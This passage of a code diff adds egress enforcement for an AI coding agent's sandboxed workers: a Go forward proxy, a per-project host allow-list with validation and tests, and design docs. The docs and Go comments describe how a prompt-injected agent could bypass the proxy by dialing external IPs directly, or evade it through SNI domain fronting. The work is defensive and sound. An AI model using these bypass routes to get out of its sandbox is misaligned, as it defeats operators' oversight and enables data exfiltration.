+  auth-gated.
+- **Egress via `HTTPS_PROXY`/`HTTP_PROXY`** pointed at a **manager-run CONNECT
+  forward proxy** — the same proxy shape the L7 egress adapter already is. This
+  is **gVisor-safe**: it needs no netfilter/NAT (there is none under gVisor), and
+  `git` / `gh` / `npm` / `opencode` already honour `*_PROXY`. That forward proxy
+  becomes the **central egress enforcement chokepoint**: because the worker has
+  no other route out of its netns, it **cannot** ignore `*_PROXY` and `connect()`
+  straight to an external IP the way it can in the shared-netns model. This is
+  the **true hard block for F1** and it **subsumes the NetworkPolicy CIDR
+  allow/deny list** (it is CGNAT-proof — enforcement is by route, not by CIDR
+  match).
+
+### Rejected alternatives
+
+- **iptables/nftables `OUTPUT` owner-match.** The gVisor Sentry has **no
+  netfilter backend** — the owner-match approach was removed in commit
+  `9d5265745`, and re-adding it regresses gVisor compatibility. Kernel-firewall
+  egress control is simply unavailable in this sandbox; this is the root reason
+  enforcement lives at L7 in the first place.
+- **Any bind-address trick** (binding `/chat` to a non-loopback address, or to
+  the pod IP only). A same-netns peer can dial `127.0.0.1` **or** the pod IP
+  identically — there is no bind address that hides a listener from a peer in the
+  same netns. No bind hard-blocks a same-netns worker.
+
+### Cost / consequences
+
+- Adds **`CAP_SYS_ADMIN`** to the manager (for `unshare(CLONE_NEWNET)` + veth
+  setup), **per-worker veth + IPAM**, and their **teardown**, plus some **spawn
+  latency**. Per-worker netns creation under gVisor is **validated feasible per
+  ADR-033**.
+- **Interim residual risk (until Fix B ships):** the worker→manager boundary is
+  **auth-only** isolation (secret stripped from worker env → `401`). This is
+  mitigated — not closed — by the hardening already applied alongside PR4: the
+  CGNAT (`100.64.0.0/10`) egress deny, the dropped default-ServiceAccount token
+  (`automountServiceAccountToken: false`), and the opt-in public-subnet node
+  placement. Fix B is the item that upgrades this from *mitigated* to *closed*.
+
+Marked here as the **enforcement target**; not implemented in code in this PR.
+
+## References
+
+- Related ADRs: ADR-033 (Langy worker network isolation under gVisor — the
+  netfilter-is-dead constraint and the Fix B netns fallback this builds on).
+- Spec: `specs/langy/langy-egress-enforcement.feature`
+- Plan: `specs/langy/langy-pr4-plan.md`
+- Code seams: `services/langyagent/adapters/workerpool/authproxy.go` (per-worker proxy pattern the
+  egress adapter mirrors), `services/langyagent/adapters/workerpool/worker.go` (`Credentials`
+  envelope + `buildWorkerEnv`), `services/langyagent/adapters/httpapi/handlers.go` (`/chat`
+  dispatch), `langwatch/src/server/routes/langy.ts` (envelope construction +
+  defense-in-depth allow-list check), `langwatch/src/server/services/langy/
+  LangyCredentialService.ts` (`getModelsAllowed` precedent).
+- Chart: `charts/langyagent/templates/networkpolicy.yaml`,
+  `charts/langyagent/values.yaml` (`networkPolicy.allowExternalHttps`).
+- Docs: `docs/langy-github-app.md §4` (NetworkPolicy / egress; existing FQDN /
+  Cilium note).

--- a/docs/langy-github-app.md
+++ b/docs/langy-github-app.md
@@ -115,6 +115,37 @@ can tighten independently), or use a CNI like Cilium that supports FQDN
 egress and add `github.com` + `api.github.com` + `codeload.github.com` to
 the allow-list.
 
+### FQDN egress is enforced at L7 by the per-worker egress adapter (ADR-043)
+
+The primary FQDN enforcement point is **not** NetworkPolicy — it is the
+per-worker **egress adapter**, an outbound forward proxy the worker's tools
+egress through via `HTTPS_PROXY`. It reads the destination FQDN from each
+`CONNECT` authority (with the TLS SNI as a cross-check) and enforces, per
+connection: require-TLS, a per-destination throttle, the per-project **customer
+allow-list** (`Project.langyEgressAllowlist`, threaded through the credentials
+envelope), and an always-on **operator FQDN floor** (`egress.fqdnFloor` in the
+chart — GitHub / gateway / control plane). The effective allow set is
+`floor ∪ customer-list`. This lives at L7 because kernel netfilter is
+unavailable under gVisor (ADR-033), so an FQDN cannot be bounded at L3/L4 in
+this pod. The default posture is **monitor-only**: with no per-project
+allow-list and `egress.enforceFloor: false`, nothing is blocked — the adapter
+watches and flags. See ADR-043 and
+`specs/langy/langy-egress-enforcement.feature`.
+
+**Honest limit — cooperative, not mandatory, in the stock pod.** Within one pod
+netns nothing forces a worker's traffic *through* the loopback proxy: a
+prompt-injected worker can ignore `HTTPS_PROXY` and `connect()` straight to an
+external IP. The adapter is authoritative for cooperating clients and the
+direct-IP bypass is still *observed* (flow-level monitoring), but not blocked.
+Two bypass-proof upgrades enforce the same floor mandatorily:
+
+- **Cilium `toFQDNs`** — set `egress.cilium.enabled: true` (requires the Cilium
+  CNI) to ship a `CiliumNetworkPolicy` that enforces the FQDN floor at the
+  datapath, which a worker cannot bypass.
+- **ADR-033 Fix B per-worker netns** — put each worker in its own network
+  namespace whose only route out is the adapter's veth. Needs `CAP_SYS_ADMIN`;
+  the non-Cilium bypass-proof option.
+
 ## 5. Verify
 
 In a session, ask Langy something like "open a PR on `<a repo you've granted

--- a/langwatch/prisma/migrations/20260710170000_add_langy_egress_allowlist/migration.sql
+++ b/langwatch/prisma/migrations/20260710170000_add_langy_egress_allowlist/migration.sql
@@ -1,0 +1,7 @@
+-- Per-project Langy egress allow-list (ADR-043). Nullable JSON array of host
+-- patterns the project's Langy workers may reach outbound. NULL/absent means
+-- monitor-only (watch, never block); a non-empty array restricts egress to
+-- floor ∪ this list at the agent pod's egress adapter. Additive, opt-in: an
+-- existing project upgrades into watching, not blocking.
+-- AlterTable
+ALTER TABLE "Project" ADD COLUMN "langyEgressAllowlist" JSONB;

--- a/langwatch/prisma/schema.prisma
+++ b/langwatch/prisma/schema.prisma
@@ -427,6 +427,17 @@ model Project {
   /// lens, used when a trace has no principal user). Accounting-only.
   departmentId String?
 
+  /// Per-project Langy egress allow-list (ADR-043). A nullable JSON array of
+  /// host patterns (`["registry.npmjs.org", "*.internal.acme.com"]`) that the
+  /// project's Langy workers may reach outbound. The *presence* of the list is
+  /// the enforcement mode: null/absent ⇒ monitor-only (watch, never block);
+  /// non-empty ⇒ the worker's egress adapter restricts outbound to
+  /// floor ∪ this list. Enforced in the agent pod's egress adapter — NOT the
+  /// gateway — so it lives on the project, not the VirtualKey. Resolved by
+  /// LangyCredentialService.getEgressAllowlist and threaded through the
+  /// per-request credentials envelope. See specs/langy/langy-egress-enforcement.feature.
+  langyEgressAllowlist Json?
+
   @@index([teamId])
   @@index([isPersonal])
   @@index([ownerUserId])

--- a/langwatch/src/factories/project.factory.ts
+++ b/langwatch/src/factories/project.factory.ts
@@ -2,11 +2,14 @@ import type { Project } from "@prisma/client";
 import { Factory } from "fishery";
 import { nanoid } from "nanoid";
 
-// Omit the Json field - Prisma's output type (JsonValue | null) is structurally
+// Omit the Json fields - Prisma's output type (JsonValue | null) is structurally
 // incompatible with its input type (InputJsonValue | NullableJsonNullValueInput).
-// Excluding it lets the factory output be spread directly into prisma.*.create()
-// while Prisma applies the column default (NULL).
-export const projectFactory = Factory.define<Omit<Project, "personalFeatures">>(
+// Excluding them lets the factory output be spread directly into prisma.*.create()
+// while Prisma applies the column default (NULL). Every nullable Json column on
+// Project (personalFeatures, langyEgressAllowlist) must be listed here.
+export const projectFactory = Factory.define<
+  Omit<Project, "personalFeatures" | "langyEgressAllowlist">
+>(
   ({ sequence }) => ({
     id: nanoid(),
     name: `Test Project ${sequence}`,

--- a/langwatch/src/server/api/root.ts
+++ b/langwatch/src/server/api/root.ts
@@ -38,6 +38,7 @@ import { groupRouter } from "./routers/group";
 import { homeRouter } from "./routers/home";
 import { httpProxyRouter } from "./routers/httpProxy";
 import { integrationsChecksRouter } from "./routers/integrationsChecks";
+import { langyEgressRouter } from "./routers/langyEgress";
 import { langyGithubRouter } from "./routers/langyGithub";
 import { licenseRouter } from "./routers/license";
 import { licenseEnforcementRouter } from "./routers/licenseEnforcement";
@@ -157,6 +158,7 @@ const coreRouters = {
   gatewayGuardrails: gatewayGuardrailsRouter,
   gatewayUsage: gatewayUsageRouter,
   langyGithub: langyGithubRouter,
+  langyEgress: langyEgressRouter,
 };
 
 const eeRouters = {

--- a/langwatch/src/server/api/routers/langyEgress.ts
+++ b/langwatch/src/server/api/routers/langyEgress.ts
@@ -1,0 +1,65 @@
+/**
+ * tRPC router for the per-project Langy egress allow-list (ADR-043).
+ *
+ *   get — the current allow-list for the settings editor. `null` means the
+ *         project is in monitor-only mode (watch, never block).
+ *   set — replaces the allow-list. An empty array clears it back to
+ *         monitor-only. Gated on `project:update` — this is a project network
+ *         policy, not per-user state.
+ *
+ * The enforcement path is the credentials envelope + the agent's egress
+ * adapter (see LangyCredentialService.getEgressAllowlist and
+ * services/langyagent/adapters/egress/adapter.go). This router is only how a
+ * customer reads and sets the value; a change takes effect on the
+ * conversation's next turn (the worker recycles when its egress signature
+ * changes).
+ */
+
+import { z } from "zod";
+import { checkProjectPermission } from "~/server/api/rbac";
+import { auditLog } from "~/server/auditLog";
+import {
+  langyEgressAllowlistSchema,
+  LangyCredentialService,
+} from "~/server/services/langy/LangyCredentialService";
+import { createTRPCRouter, protectedProcedure } from "../trpc";
+
+export const langyEgressRouter = createTRPCRouter({
+  get: protectedProcedure
+    .input(z.object({ projectId: z.string() }))
+    .use(checkProjectPermission("project:view"))
+    .query(async ({ ctx, input }) => {
+      const service = LangyCredentialService.create(ctx.prisma);
+      const allowlist = await service.getEgressAllowlist({
+        projectId: input.projectId,
+      });
+      // `null` ⇒ monitor-only. The editor renders an empty list + the
+      // "leave empty to watch without blocking" hint in that state.
+      return { allowlist: allowlist ?? [], enforcing: allowlist !== null };
+    }),
+
+  set: protectedProcedure
+    .input(
+      z.object({
+        projectId: z.string(),
+        allowlist: langyEgressAllowlistSchema,
+      }),
+    )
+    .use(checkProjectPermission("project:update"))
+    .mutation(async ({ ctx, input }) => {
+      const service = LangyCredentialService.create(ctx.prisma);
+      const saved = await service.setEgressAllowlist({
+        projectId: input.projectId,
+        allowlist: input.allowlist,
+      });
+      await auditLog({
+        userId: ctx.session.user.id,
+        projectId: input.projectId,
+        action: "langy.egress.setAllowlist",
+        // The host list travels further than the UI (SIEM, tickets); log only
+        // its shape, mirroring how langy.ts logs the model allow-list.
+        metadata: { entryCount: saved?.length ?? 0, enforcing: saved !== null },
+      });
+      return { allowlist: saved ?? [], enforcing: saved !== null };
+    }),
+});

--- a/langwatch/src/server/routes/langy.ts
+++ b/langwatch/src/server/routes/langy.ts
@@ -378,6 +378,29 @@ langyRoute().post("/langy/chat", async (c) => {
     throw error;
   }
 
+  // Resolve the project's Langy egress allow-list (ADR-043) and attach it to
+  // the credentials envelope. The presence of the list is the mode: null ⇒ the
+  // worker's egress adapter watches but blocks nothing; a set list ⇒ the
+  // adapter restricts outbound to floor ∪ this list. It rides the same /chat
+  // body every other capability does — no second channel — and is bound at
+  // worker spawn (a change recycles the worker on its next turn). A drifted
+  // column throws in getEgressAllowlist and fails closed here; surface a 409
+  // rather than silently running with enforcement disabled.
+  try {
+    const egressAllowlist = await credentialService.getEgressAllowlist({
+      projectId,
+    });
+    if (egressAllowlist) {
+      credentials.egressAllowlist = egressAllowlist;
+    }
+  } catch (error) {
+    logger.error({ error, projectId }, "failed to resolve Langy egress allow-list");
+    return c.json(
+      { error: "Langy egress policy is misconfigured for this project." },
+      { status: 409 },
+    );
+  }
+
   // Defense in depth: when a `modelOverride` rides in, enforce the project's
   // Langy VK allowlist HERE — don't trust the picker UI to gate it. If the VK
   // has no allowlist (modelsAllowed=null), the gateway is still the final

--- a/langwatch/src/server/services/langy/LangyCredentialService.ts
+++ b/langwatch/src/server/services/langy/LangyCredentialService.ts
@@ -1,4 +1,5 @@
-import type { PrismaClient } from "@prisma/client";
+import { Prisma, type PrismaClient } from "@prisma/client";
+import { z } from "zod";
 
 import type { Session } from "~/server/auth";
 import { parseVirtualKeyConfig } from "~/server/gateway/virtualKey.config";
@@ -14,6 +15,27 @@ import { provisionLangyVirtualKey } from "./langyVirtualKey";
 
 const logger = createLogger("langwatch:langy:credentials");
 const githubLogger = createLogger("langwatch:langy:credentials:github");
+
+/**
+ * The per-project Langy egress allow-list (ADR-043). Each entry is either an
+ * exact host (`registry.npmjs.org`) or a single-leading-label wildcard
+ * (`*.internal.acme.com`). Validated at read time so a drifted column value
+ * fails closed (throws) rather than silently disabling enforcement — the same
+ * posture `getModelsAllowed` takes on a malformed VK config. Kept in sync with
+ * the Go matcher (`hostMatchesAny` in
+ * services/langyagent/adapters/egress/policy.go).
+ */
+const egressHostPatternSchema = z
+  .string()
+  .trim()
+  .min(1)
+  .max(253)
+  .regex(
+    /^(\*\.)?([a-zA-Z0-9-]+\.)*[a-zA-Z0-9-]+\.?$/,
+    "egress allow-list entries must be a host or a *.suffix wildcard",
+  );
+
+export const langyEgressAllowlistSchema = z.array(egressHostPatternSchema);
 
 /**
  * The Langy worker hands `gatewayBaseUrl` straight to OpenCode as
@@ -78,6 +100,14 @@ export type LangyCredentials = {
    * "Acting as @login" sidebar chip.
    */
   githubLogin?: string;
+  /**
+   * The project's Langy egress allow-list (ADR-043). Threaded into the agent's
+   * per-request credentials envelope; the worker's egress adapter is
+   * constructed with it at spawn. Absent/empty ⇒ monitor-only (the adapter
+   * watches but blocks nothing); non-empty ⇒ the adapter restricts outbound to
+   * floor ∪ this list. The *presence* of the list is the enforcement mode.
+   */
+  egressAllowlist?: string[];
 };
 
 /**
@@ -275,5 +305,64 @@ export class LangyCredentialService {
     const parsed = parseVirtualKeyConfig(langyVk.config);
     const allowed = parsed.modelsAllowed;
     return allowed && allowed.length > 0 ? allowed : null;
+  }
+
+  /**
+   * Returns the project's Langy egress allow-list (ADR-043 rung 2), or `null`
+   * when unset/empty. `null` ⇒ monitor-only (the agent's egress adapter
+   * watches but blocks nothing); a non-empty array ⇒ the enforced set (the
+   * adapter restricts outbound to floor ∪ this list). Same `null-means-watch`
+   * convention as `getModelsAllowed`.
+   *
+   * Unlike the model allow-list — which lives on the VirtualKey because the
+   * *gateway* enforces it — the egress list is a project network policy
+   * enforced by the *agent pod's egress adapter*, so it lives on the Project
+   * (ADR-043 §"Where the allow-list config lives"). The value is parsed through
+   * Zod so a drifted/corrupt column fails closed (throws) rather than silently
+   * disabling enforcement — a stray non-array or a bad host pattern must not
+   * quietly open egress.
+   */
+  async getEgressAllowlist({
+    projectId,
+  }: {
+    projectId: string;
+  }): Promise<string[] | null> {
+    // The Project row IS the tenant root here; its id is the projectId filter
+    // (multitenancy). No cross-project value can be returned.
+    const project = await this.prisma.project.findUnique({
+      where: { id: projectId },
+      select: { langyEgressAllowlist: true },
+    });
+    if (!project || project.langyEgressAllowlist == null) return null;
+    const parsed = langyEgressAllowlistSchema.parse(project.langyEgressAllowlist);
+    return parsed.length > 0 ? parsed : null;
+  }
+
+  /**
+   * Writes the project's Langy egress allow-list (ADR-043). Validates + trims
+   * every entry through the same Zod schema the resolver reads by, so a client
+   * cannot persist a malformed host pattern. An empty array clears the column
+   * to `null` (monitor-only) — the canonical "unset" state — rather than
+   * storing `[]`, keeping the resolver's null/empty branches equivalent.
+   * Setting or clearing the list takes effect on the conversation's next turn
+   * (the worker recycles when its egress signature changes).
+   */
+  async setEgressAllowlist({
+    projectId,
+    allowlist,
+  }: {
+    projectId: string;
+    allowlist: string[];
+  }): Promise<string[] | null> {
+    const parsed = langyEgressAllowlistSchema.parse(allowlist);
+    const normalized = parsed.map((h) =>
+      h.trim().replace(/\.$/, "").toLowerCase(),
+    );
+    const value = normalized.length > 0 ? normalized : null;
+    await this.prisma.project.update({
+      where: { id: projectId },
+      data: { langyEgressAllowlist: value ?? Prisma.DbNull },
+    });
+    return value;
   }
 }

--- a/langwatch/src/server/services/langy/__tests__/LangyCredentialService.unit.test.ts
+++ b/langwatch/src/server/services/langy/__tests__/LangyCredentialService.unit.test.ts
@@ -424,4 +424,148 @@ describe("LangyCredentialService", () => {
       });
     });
   });
+
+  // Per-project Langy egress allow-list (ADR-043). Read by /langy/chat and
+  // threaded into the credentials envelope; the agent's egress adapter is
+  // constructed with it at spawn. null/empty = monitor-only (watch, never
+  // block); a set list = the enforced set (floor ∪ list). Parsed through Zod so
+  // a drifted column fails closed rather than silently disabling enforcement.
+  describe("getEgressAllowlist", () => {
+    function makePrismaWithProject(langyEgressAllowlist: unknown) {
+      const findUnique = vi.fn().mockResolvedValue({ langyEgressAllowlist });
+      return {
+        project: { findUnique },
+      } as any;
+    }
+
+    describe("when the project has no allow-list column value", () => {
+      it("returns null — monitor-only (watch, never block)", async () => {
+        const prisma = makePrismaWithProject(null);
+        const svc = new LangyCredentialService(prisma);
+
+        expect(
+          await svc.getEgressAllowlist({ projectId: "p1" }),
+        ).toBeNull();
+        // Reads the Project by its own id (the tenancy filter) and selects only
+        // the column — no cross-project value can be returned.
+        expect(prisma.project.findUnique).toHaveBeenCalledWith({
+          where: { id: "p1" },
+          select: { langyEgressAllowlist: true },
+        });
+      });
+    });
+
+    describe("when the allow-list is an empty array", () => {
+      it("returns null — empty is equivalent to unset (monitor-only)", async () => {
+        const prisma = makePrismaWithProject([]);
+        const svc = new LangyCredentialService(prisma);
+
+        expect(await svc.getEgressAllowlist({ projectId: "p1" })).toBeNull();
+      });
+    });
+
+    describe("when the allow-list has host patterns", () => {
+      it("returns the array — the enforced set", async () => {
+        const prisma = makePrismaWithProject([
+          "registry.npmjs.org",
+          "*.internal.acme.com",
+        ]);
+        const svc = new LangyCredentialService(prisma);
+
+        expect(await svc.getEgressAllowlist({ projectId: "p1" })).toEqual([
+          "registry.npmjs.org",
+          "*.internal.acme.com",
+        ]);
+      });
+    });
+
+    describe("when the project does not exist", () => {
+      it("returns null", async () => {
+        const prisma = { project: { findUnique: vi.fn().mockResolvedValue(null) } } as any;
+        const svc = new LangyCredentialService(prisma);
+
+        expect(await svc.getEgressAllowlist({ projectId: "missing" })).toBeNull();
+      });
+    });
+
+    describe("when the column value is malformed (a drifted non-array)", () => {
+      it("throws (via Zod) — a silent-disable would open egress", async () => {
+        const prisma = makePrismaWithProject("attacker.example.com");
+        const svc = new LangyCredentialService(prisma);
+
+        await expect(
+          svc.getEgressAllowlist({ projectId: "p1" }),
+        ).rejects.toThrow();
+      });
+    });
+
+    describe("when an entry is not a valid host pattern", () => {
+      it("throws — a bad pattern must not persist to the enforced set", async () => {
+        const prisma = makePrismaWithProject(["not a host!!"]);
+        const svc = new LangyCredentialService(prisma);
+
+        await expect(
+          svc.getEgressAllowlist({ projectId: "p1" }),
+        ).rejects.toThrow();
+      });
+    });
+  });
+
+  describe("setEgressAllowlist", () => {
+    function makePrismaForWrite() {
+      const update = vi.fn().mockResolvedValue({});
+      return { prisma: { project: { update } } as any, update };
+    }
+
+    describe("when given host patterns", () => {
+      it("normalises (trim / lowercase / drop trailing dot) and writes them", async () => {
+        const { prisma, update } = makePrismaForWrite();
+        const svc = new LangyCredentialService(prisma);
+
+        const saved = await svc.setEgressAllowlist({
+          projectId: "p1",
+          allowlist: ["Registry.NPMjs.org.", "  *.Internal.Acme.com "],
+        });
+
+        expect(saved).toEqual(["registry.npmjs.org", "*.internal.acme.com"]);
+        expect(update).toHaveBeenCalledWith({
+          where: { id: "p1" },
+          data: { langyEgressAllowlist: ["registry.npmjs.org", "*.internal.acme.com"] },
+        });
+      });
+    });
+
+    describe("when given an empty list", () => {
+      it("clears the column to database NULL (back to monitor-only)", async () => {
+        const { prisma, update } = makePrismaForWrite();
+        const svc = new LangyCredentialService(prisma);
+
+        const saved = await svc.setEgressAllowlist({
+          projectId: "p1",
+          allowlist: [],
+        });
+
+        expect(saved).toBeNull();
+        // DbNull writes SQL NULL for a nullable Json column; [] would read back
+        // as "empty" which the resolver already treats as null, but null is the
+        // canonical unset state.
+        expect(update).toHaveBeenCalledWith({
+          where: { id: "p1" },
+          data: { langyEgressAllowlist: Prisma.DbNull },
+        });
+      });
+    });
+
+    describe("when given an invalid host pattern", () => {
+      it("throws before writing anything", async () => {
+        const { prisma, update } = makePrismaForWrite();
+        const svc = new LangyCredentialService(prisma);
+
+        await expect(
+          svc.setEgressAllowlist({ projectId: "p1", allowlist: ["bad host"] }),
+        ).rejects.toThrow();
+        expect(update).not.toHaveBeenCalled();
+      });
+    });
+  });
 });

--- a/services/langyagent/adapters/egress/adapter.go
+++ b/services/langyagent/adapters/egress/adapter.go
@@ -1,0 +1,303 @@
+package egress
+
+import (
+	"context"
+	"fmt"
+	"io"
+	"net"
+	"net/http"
+	"sync"
+	"sync/atomic"
+	"time"
+
+	"go.uber.org/zap"
+)
+
+// egressAdapter is the per-worker outbound forward proxy (ADR-043). It is the
+// egress twin of the workerpool authProxy: the authProxy fronts a worker's
+// INBOUND opencode control port; this fronts the worker's OUTBOUND traffic. The
+// worker's tools (`gh`, `git`, `npm`, `curl`, `pip`) egress through it via
+// HTTPS_PROXY, and the adapter enforces, per CONNECT:
+//
+//	rung 1a  require-TLS      — only opaque CONNECT :443 tunnels; cleartext
+//	                            forwards to external hosts are refused.
+//	rung 1b  throttle         — per-destination connection-burst tar-pit and
+//	                            byte-rate cap (soft; slows, never a hard cliff).
+//	rung 2   customer list    — presence of the list is the mode: unset ⇒
+//	                            monitor-only, set ⇒ restrict to it.
+//	rung 3   FQDN floor        — always-allowed structural set (github / gateway
+//	                            / control plane), read from the CONNECT authority
+//	                            with the TLS SNI as a cross-check.
+//	rung 0   monitor          — every decision above ALSO flags (see event.go).
+//
+// Honest limit (ADR-043 "Where FQDN enforcement lives"): within one pod netns
+// nothing forces a worker's traffic THROUGH this loopback proxy — a hostile
+// worker can ignore HTTPS_PROXY and connect() straight to an external IP:443.
+// This adapter is authoritative for COOPERATING clients (the primary
+// mechanism) and the direct-IP bypass is still SEEN by the flow-level monitor;
+// operators who need mandatory enforcement add the Cilium toFQDNs policy or the
+// ADR-033 Fix B per-worker netns.
+type egressAdapter struct {
+	server   *http.Server
+	listen   net.Listener
+	port     int
+	throttle *egressThrottle
+	cfg      egressAdapterConfig
+}
+
+// egressAdapterConfig is everything the adapter needs, bound at spawn. The
+// policy + throttle are derived from THIS worker's credentials envelope and the
+// operator floor, so a policy change recycles the worker rather than mutating a
+// live adapter (see domain.SignatureOf).
+type egressAdapterConfig struct {
+	conversationID string
+	policy         egressPolicy
+	throttle       throttleConfig
+	monitor        egressMonitor
+	// dial reaches the real upstream. Injected so tests can redirect any
+	// authority to a loopback listener; production uses a bounded net.Dialer.
+	dial func(ctx context.Context, network, addr string) (net.Conn, error)
+	// requireTLS refuses cleartext forwards and CONNECT to any port other than
+	// tlsPort (rung 1a). On by default in production — worker egress is HTTPS
+	// already, so this rung is the always-safe one.
+	requireTLS bool
+	tlsPort    string
+	// sniCrossCheck peeks the TLS ClientHello SNI and refuses a definite
+	// mismatch with the CONNECT authority (anti domain-fronting).
+	sniCrossCheck  bool
+	sniPeekTimeout time.Duration
+	dialTimeout    time.Duration
+	log            *zap.Logger
+}
+
+// startEgressAdapter binds 127.0.0.1:port and serves the forward proxy. Pass
+// port 0 to bind an OS-chosen ephemeral port (the caller reads adapter.port for
+// the actual value). The returned adapter is already serving; the caller closes
+// it via shutdown(). Mirrors the workerpool authProxy lifecycle so the pool
+// treats both per-worker proxies identically.
+func startEgressAdapter(port int, cfg egressAdapterConfig) (*egressAdapter, error) {
+	if cfg.log == nil {
+		cfg.log = zap.NewNop()
+	}
+	if cfg.monitor == nil {
+		cfg.monitor = newLogEgressMonitor(cfg.log)
+	}
+	if cfg.dial == nil {
+		d := &net.Dialer{Timeout: nonZeroDuration(cfg.dialTimeout, 10*time.Second)}
+		cfg.dial = d.DialContext
+	}
+	if cfg.tlsPort == "" {
+		cfg.tlsPort = "443"
+	}
+	if cfg.sniPeekTimeout == 0 {
+		cfg.sniPeekTimeout = 5 * time.Second
+	}
+
+	adapter := &egressAdapter{
+		throttle: newEgressThrottle(cfg.throttle),
+		cfg:      cfg,
+	}
+
+	addr := fmt.Sprintf("127.0.0.1:%d", port)
+	listener, err := net.Listen("tcp", addr)
+	if err != nil {
+		return nil, fmt.Errorf("egress adapter listen %s: %w", addr, err)
+	}
+	adapter.listen = listener
+	adapter.port = listener.Addr().(*net.TCPAddr).Port
+
+	srv := &http.Server{
+		Handler:           adapter,
+		ReadHeaderTimeout: 10 * time.Second,
+	}
+	adapter.server = srv
+	go func() {
+		if err := srv.Serve(listener); err != nil && err != http.ErrServerClosed {
+			cfg.log.Error("egress adapter serve exited",
+				zap.String("addr", addr),
+				zap.Error(err),
+			)
+		}
+	}()
+	return adapter, nil
+}
+
+// shutdown stops the adapter goroutine. Best-effort with a short deadline, to
+// match the authProxy: a worker recycle must not block on draining tunnels.
+func (a *egressAdapter) shutdown() {
+	if a == nil || a.server == nil {
+		return
+	}
+	ctx, cancel := context.WithTimeout(context.Background(), 1*time.Second)
+	defer cancel()
+	_ = a.server.Shutdown(ctx)
+}
+
+// ServeHTTP dispatches CONNECT tunnels; every other method is a cleartext
+// forward-proxy request, which rung 1a refuses.
+func (a *egressAdapter) ServeHTTP(w http.ResponseWriter, r *http.Request) {
+	if r.Method == http.MethodConnect {
+		a.handleConnect(w, r)
+		return
+	}
+	// Absolute-form (plain-HTTP) proxy request. The adapter only proxies opaque
+	// TLS tunnels; forwarding cleartext to an external host is exactly the
+	// exfil-over-plaintext path rung 1a closes. The destination never sees the
+	// bytes — we answer 403 before touching the network.
+	host := hostOnly(r.Host)
+	if host == "" && r.URL != nil {
+		host = hostOnly(r.URL.Host)
+	}
+	a.cfg.monitor.record(egressEvent{
+		ConversationID: a.cfg.conversationID,
+		Host:           host,
+		Decision:       egressDeniedCleartext,
+		Reason:         "cleartext http forward refused",
+	})
+	http.Error(w, "cleartext egress refused: HTTPS only", http.StatusForbidden)
+}
+
+// handleConnect runs the per-CONNECT decision pipeline and, when allowed,
+// splices an opaque bidirectional tunnel.
+func (a *egressAdapter) handleConnect(w http.ResponseWriter, r *http.Request) {
+	authority := r.Host
+	host, port := splitHostPortLoose(authority)
+	fqdn := normalizeHost(host)
+
+	// rung 1a: require TLS — only :443 tunnels. A CONNECT to any other port is
+	// not a TLS flow we can bound, so it is refused (destination never dialed).
+	if a.cfg.requireTLS && port != a.cfg.tlsPort {
+		a.record(fqdn, port, egressDeniedCleartext, "connect to non-tls port", 0)
+		http.Error(w, "egress refused: TLS (:443) only", http.StatusForbidden)
+		return
+	}
+
+	// rungs 2/3: allow-list ∪ floor decision on the authority FQDN. The decision
+	// is flagged immediately (rung 0: every decision is a monitored event, in
+	// real time — not only on flow completion). On a deny we answer 403 BEFORE
+	// hijacking or dialing, so the destination receives no bytes — the
+	// enforcement guarantee.
+	decision := a.cfg.policy.decide(fqdn)
+	a.record(fqdn, port, decision, "connect decision", 0)
+	if decision.blocked() {
+		http.Error(w, "egress destination not allowed for this project", http.StatusForbidden)
+		return
+	}
+
+	// rung 1b: per-destination throttle. Soft — a burst is tar-pitted (slowed)
+	// and flagged, never hard-denied.
+	tarpit, throttled := a.throttle.admitConnection(fqdn)
+
+	hijacker, ok := w.(http.Hijacker)
+	if !ok {
+		a.record(fqdn, port, decision, "hijack unsupported", 0)
+		http.Error(w, "proxy misconfigured", http.StatusInternalServerError)
+		return
+	}
+	clientConn, _, err := hijacker.Hijack()
+	if err != nil {
+		a.record(fqdn, port, decision, "hijack failed: "+err.Error(), 0)
+		return
+	}
+	defer clientConn.Close()
+
+	if throttled && tarpit > 0 {
+		a.record(fqdn, port, egressThrottled, "connection burst tar-pit", 0)
+		time.Sleep(tarpit)
+	}
+
+	if _, err := io.WriteString(clientConn, "HTTP/1.1 200 Connection Established\r\n\r\n"); err != nil {
+		return
+	}
+
+	// rung 3 cross-check: peek the TLS ClientHello SNI (without terminating
+	// TLS) and re-run the decision against the host the client is REALLY
+	// negotiating with. Catches domain-fronting — `CONNECT allowed:443` then a
+	// TLS SNI of `attacker.com` on a shared CDN IP. The authority passed; if the
+	// differing SNI would NOT pass the same allow set, it never reaches the
+	// destination. A benign quirk (SNI differs but is itself allowed) proceeds.
+	if a.cfg.sniCrossCheck {
+		sni, replay, perr := peekClientHelloSNI(clientConn, a.cfg.sniPeekTimeout)
+		clientConn = replay
+		if perr == nil && sni != "" && sni != fqdn {
+			if a.cfg.policy.decide(sni).blocked() {
+				a.record(sni, port, egressDeniedSNIMismatch,
+					fmt.Sprintf("sni %q not allowed (authority was %q)", sni, fqdn), 0)
+				return
+			}
+		}
+	}
+
+	ctx := r.Context()
+	upstream, err := a.cfg.dial(ctx, "tcp", authority)
+	if err != nil {
+		a.record(fqdn, port, decision, "upstream dial failed: "+err.Error(), 0)
+		return
+	}
+	defer upstream.Close()
+
+	bytesUp := a.tunnel(ctx, clientConn, upstream, fqdn)
+	a.record(fqdn, port, decision, "tunnel closed", bytesUp)
+}
+
+// tunnel splices client<->upstream opaquely. The client→upstream direction
+// (the exfiltration direction) is metered by the per-destination byte throttle;
+// the response direction is copied plain. Either side's EOF closes both.
+func (a *egressAdapter) tunnel(ctx context.Context, clientConn, upstream net.Conn, fqdn string) int64 {
+	lim := a.throttle.limiterFor(fqdn)
+	var bytesUp int64
+	var once sync.Once
+	closeBoth := func() { once.Do(func() { _ = clientConn.Close(); _ = upstream.Close() }) }
+
+	done := make(chan struct{}, 2)
+	go func() {
+		n, _, _ := throttledCopy(ctx, upstream, clientConn, lim)
+		atomic.AddInt64(&bytesUp, n)
+		closeBoth()
+		done <- struct{}{}
+	}()
+	go func() {
+		_, _ = io.Copy(clientConn, upstream)
+		closeBoth()
+		done <- struct{}{}
+	}()
+	<-done
+	<-done
+	return atomic.LoadInt64(&bytesUp)
+}
+
+// record is the single flag point — rung 0. Every decision (allow / throttle /
+// deny) lands here so an enforced deny is a monitored deny.
+func (a *egressAdapter) record(host, port string, decision egressDecision, reason string, bytesUp int64) {
+	a.cfg.monitor.record(egressEvent{
+		ConversationID: a.cfg.conversationID,
+		Host:           host,
+		Port:           port,
+		Decision:       decision,
+		Reason:         reason,
+		Bytes:          bytesUp,
+	})
+}
+
